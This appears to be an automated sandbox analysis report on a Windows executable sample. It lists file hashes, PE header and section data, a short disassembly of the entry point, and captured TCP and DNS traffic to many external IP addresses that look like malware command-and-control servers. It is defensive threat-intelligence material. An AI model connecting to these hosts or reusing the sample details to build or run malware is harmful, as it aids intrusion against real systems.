                                                                                                                                                                                          SHA-512:FB897D034727E2DA9F46E3C3313AA2476E78B6DA96D1BE14C6F9ED32FE8D3D595933D1BE67CC4E5B825FFF3D00345A3092DCDB4E744C316844A078E77936583C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.r. .. 3.1. .. 2.0.2.1. .1.7.:.5.7.:.3.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.r. .. 3.1. .. 2.0.2.1. .1.7.:.5.7.:.3.6.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):6.436116781781946
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:sample.exe.exe
                                                                                                                                                                                          File size:45568
                                                                                                                                                                                          MD5:ecbc4b40dcfec4ed1b2647b217da0441
                                                                                                                                                                                          SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
                                                                                                                                                                                          SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
                                                                                                                                                                                          SHA512:3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
                                                                                                                                                                                          SSDEEP:768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:00828e8e8686b000

                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Entrypoint:0x409ee0
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                          Time Stamp:0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                          Import Hash:4cfe8bbfb0ca5b84bbad08b043ea0c87

                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                          Instruction
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push 0040C1F0h
                                                                                                                                                                                          push 3966646Ch
                                                                                                                                                                                          push 00000009h
                                                                                                                                                                                          mov ecx, D22E2014h
                                                                                                                                                                                          call 00007F48885566FEh
                                                                                                                                                                                          mov edx, 004011F0h
                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                          call 00007F4888556622h
                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                          mov ecx, 8F7EE672h
                                                                                                                                                                                          push 0040C0D0h
                                                                                                                                                                                          push 6677A1D2h
                                                                                                                                                                                          push 00000048h
                                                                                                                                                                                          call 00007F48885566D9h
                                                                                                                                                                                          mov edx, 004010D0h
                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                          call 00007F48885565FDh
                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                          push 08000000h
                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                          call dword ptr [0040C1A8h]
                                                                                                                                                                                          push eax
                                                                                                                                                                                          call dword ptr [0040C10Ch]
                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                          test esi, esi
                                                                                                                                                                                          je 00007F488855EA38h
                                                                                                                                                                                          push 08000000h
                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                          push esi
                                                                                                                                                                                          call dword ptr [0040C1F8h]
                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                          call dword ptr [0040C1A8h]
                                                                                                                                                                                          push eax
                                                                                                                                                                                          call dword ptr [0040C1E8h]
                                                                                                                                                                                          call 00007F488855605Ah
                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                          call dword ptr [0040C1ACh]
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          ret
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          int3
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push edi
                                                                                                                                                                                          mov edi, edx
                                                                                                                                                                                          mov dword ptr [ebp-0Ch], ecx
                                                                                                                                                                                          mov esi, 00000001h
                                                                                                                                                                                          mov dword ptr [ebp-08h], esi
                                                                                                                                                                                          mov eax, dword ptr [edi]
                                                                                                                                                                                          cmp eax, 7Fh
                                                                                                                                                                                          jbe 00007F488855EA21h
                                                                                                                                                                                          lea ecx, dword ptr [ecx+00h]
                                                                                                                                                                                          shr eax, 07h
                                                                                                                                                                                          inc esi
                                                                                                                                                                                          cmp eax, 7Fh

                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                          • [LNK] VS2013 UPD4 build 31101
                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                          Data Directories

                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbad00x28.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xd0000x5cc.reloc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb0000x8.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                          Sections

                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          .text0x10000x98830x9a00False0.503297483766data6.45508103349IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rdata0xb0000xb2e0xc00False0.160807291667data4.23495809712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .data0xc0000xbd80x200False0.123046875data0.91267432928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .reloc0xd0000x5cc0x600False0.8671875data6.49434732961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                          Imports

                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          KERNEL32.dllWTSGetActiveConsoleSessionId

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Mar 31, 2021 17:56:00.212443113 CEST49712443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 17:56:00.264734030 CEST4434971279.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:00.264987946 CEST49712443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 17:56:00.265796900 CEST49712443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 17:56:00.317929983 CEST4434971279.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:00.320611000 CEST4434971279.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:00.320645094 CEST4434971279.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:00.320790052 CEST49712443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 17:56:00.321348906 CEST49712443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 17:56:00.371644974 CEST4434971279.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:30.712719917 CEST497258080192.168.2.3193.169.54.12
                                                                                                                                                                                          Mar 31, 2021 17:56:33.886065006 CEST497258080192.168.2.3193.169.54.12
                                                                                                                                                                                          Mar 31, 2021 17:56:39.886666059 CEST497258080192.168.2.3193.169.54.12
                                                                                                                                                                                          Mar 31, 2021 17:57:22.737021923 CEST497378080192.168.2.3173.230.145.224
                                                                                                                                                                                          Mar 31, 2021 17:57:22.930104971 CEST808049737173.230.145.224192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:57:23.439745903 CEST497378080192.168.2.3173.230.145.224
                                                                                                                                                                                          Mar 31, 2021 17:57:23.632977962 CEST808049737173.230.145.224192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:57:24.140608072 CEST497378080192.168.2.3173.230.145.224
                                                                                                                                                                                          Mar 31, 2021 17:58:06.741480112 CEST497407080192.168.2.380.86.91.232
                                                                                                                                                                                          Mar 31, 2021 17:58:09.738343000 CEST497407080192.168.2.380.86.91.232
                                                                                                                                                                                          Mar 31, 2021 17:58:15.738532066 CEST497407080192.168.2.380.86.91.232
                                                                                                                                                                                          Mar 31, 2021 17:58:58.705605030 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:58.843516111 CEST8049751167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:58.843621016 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:58.844094992 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:58.983886003 CEST8049751167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:58.984797955 CEST8049751167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:58.984878063 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.123442888 CEST8049751167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.123609066 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.157458067 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.293031931 CEST44349752167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.293200970 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.323503971 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.459156990 CEST44349752167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460279942 CEST44349752167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460320950 CEST44349752167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460346937 CEST44349752167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460375071 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460436106 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460445881 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.512870073 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:58:59.648633003 CEST44349752167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:59.648737907 CEST49752443192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:59:03.990246058 CEST8049751167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:59:03.990438938 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:59:29.700829983 CEST497534143192.168.2.380.82.115.164
                                                                                                                                                                                          Mar 31, 2021 17:59:32.694202900 CEST497534143192.168.2.380.82.115.164
                                                                                                                                                                                          Mar 31, 2021 17:59:38.710330963 CEST497534143192.168.2.380.82.115.164
                                                                                                                                                                                          Mar 31, 2021 17:59:40.133820057 CEST4975180192.168.2.3167.114.153.153
                                                                                                                                                                                          Mar 31, 2021 17:59:40.271415949 CEST8049751167.114.153.153192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:00:21.714735031 CEST497544143192.168.2.371.244.60.231
                                                                                                                                                                                          Mar 31, 2021 18:00:24.729702950 CEST497544143192.168.2.371.244.60.231
                                                                                                                                                                                          Mar 31, 2021 18:00:30.730319977 CEST497544143192.168.2.371.244.60.231
                                                                                                                                                                                          Mar 31, 2021 18:01:13.715924025 CEST497604143192.168.2.3186.103.199.252
                                                                                                                                                                                          Mar 31, 2021 18:01:16.718753099 CEST497604143192.168.2.3186.103.199.252
                                                                                                                                                                                          Mar 31, 2021 18:01:22.734764099 CEST497604143192.168.2.3186.103.199.252
                                                                                                                                                                                          Mar 31, 2021 18:02:05.732856989 CEST4976180192.168.2.337.187.4.178
                                                                                                                                                                                          Mar 31, 2021 18:02:05.784579992 CEST804976137.187.4.178192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:02:06.285088062 CEST4976180192.168.2.337.187.4.178
                                                                                                                                                                                          Mar 31, 2021 18:02:06.336576939 CEST804976137.187.4.178192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:02:06.847619057 CEST4976180192.168.2.337.187.4.178
                                                                                                                                                                                          Mar 31, 2021 18:02:06.899385929 CEST804976137.187.4.178192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:02:37.725954056 CEST497624143192.168.2.3159.203.94.198
                                                                                                                                                                                          Mar 31, 2021 18:02:37.849355936 CEST414349762159.203.94.198192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:02:38.350570917 CEST497624143192.168.2.3159.203.94.198
                                                                                                                                                                                          Mar 31, 2021 18:02:38.474059105 CEST414349762159.203.94.198192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:02:38.975692034 CEST497624143192.168.2.3159.203.94.198
                                                                                                                                                                                          Mar 31, 2021 18:02:39.098889112 CEST414349762159.203.94.198192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:09.752506971 CEST49766443192.168.2.3178.62.39.238
                                                                                                                                                                                          Mar 31, 2021 18:03:09.803896904 CEST44349766178.62.39.238192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:09.804696083 CEST49766443192.168.2.3178.62.39.238
                                                                                                                                                                                          Mar 31, 2021 18:03:09.805138111 CEST49766443192.168.2.3178.62.39.238
                                                                                                                                                                                          Mar 31, 2021 18:03:09.856822968 CEST44349766178.62.39.238192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:09.856867075 CEST44349766178.62.39.238192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:09.856889963 CEST44349766178.62.39.238192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:09.856955051 CEST49766443192.168.2.3178.62.39.238
                                                                                                                                                                                          Mar 31, 2021 18:03:09.857002020 CEST49766443192.168.2.3178.62.39.238
                                                                                                                                                                                          Mar 31, 2021 18:03:09.857136965 CEST49766443192.168.2.3178.62.39.238
                                                                                                                                                                                          Mar 31, 2021 18:03:09.907133102 CEST44349766178.62.39.238192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:40.700272083 CEST49768443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 18:03:40.754645109 CEST4434976879.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:40.754837990 CEST49768443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 18:03:40.755369902 CEST49768443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 18:03:40.808815956 CEST4434976879.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:40.808885098 CEST4434976879.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:40.808901072 CEST4434976879.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:40.808995962 CEST49768443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 18:03:40.809197903 CEST49768443192.168.2.379.172.249.82
                                                                                                                                                                                          Mar 31, 2021 18:03:40.862045050 CEST4434976879.172.249.82192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:04:11.720503092 CEST497698080192.168.2.3193.169.54.12
                                                                                                                                                                                          Mar 31, 2021 18:04:14.733405113 CEST497698080192.168.2.3193.169.54.12
                                                                                                                                                                                          Mar 31, 2021 18:04:20.749504089 CEST497698080192.168.2.3193.169.54.12

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Mar 31, 2021 17:55:45.498162985 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:45.547303915 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:46.634615898 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:46.683418036 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:47.769715071 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:47.817470074 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:48.954103947 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:49.000056982 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:50.511626005 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:50.560811996 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:52.274043083 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:52.321363926 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:53.192523003 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:53.249064922 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:55.314934969 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:55.360958099 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:56.551472902 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:56.608149052 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:55:58.426671982 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:55:58.478041887 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:00.603562117 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:00.651134968 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:01.400913954 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:01.450402975 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:02.356149912 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:02.413156986 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:03.486516953 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:03.536665916 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:04.413454056 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:04.460398912 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:05.442051888 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:05.490994930 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:07.619702101 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:07.677272081 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:21.060086966 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:21.106255054 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:23.204605103 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:23.268930912 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:37.596797943 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:37.652764082 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:40.482841015 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:40.540604115 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:46.360589981 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:46.434679985 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:56:59.159401894 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:56:59.205893040 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:57:02.142410994 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:57:02.198964119 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:57:34.671855927 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:57:34.718569994 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:57:36.600938082 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:57:36.655900002 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:39.675403118 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:39.829457045 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:40.477870941 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:40.589680910 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:41.049614906 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:41.103923082 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:41.540025949 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:41.594657898 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:42.139061928 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:42.195374966 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:43.000121117 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:43.054495096 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:43.645534992 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:43.702896118 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:44.469409943 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:44.517245054 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:45.484530926 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:45.538670063 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 17:58:46.215670109 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 17:58:46.272313118 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:00:38.203613997 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:00:38.265052080 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:00:38.838105917 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:00:38.900677919 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:00:42.515965939 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:00:42.578442097 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:00:46.771610975 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:00:46.837157011 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:00:47.161499977 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:00:47.223603010 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:05.948251963 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:03:06.005335093 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:06.178822041 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:03:06.233441114 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:06.811445951 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:03:06.858830929 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                                          Mar 31, 2021 18:03:39.566546917 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                                          Mar 31, 2021 18:03:39.636120081 CEST53571458.8.8.8192.168.2.3

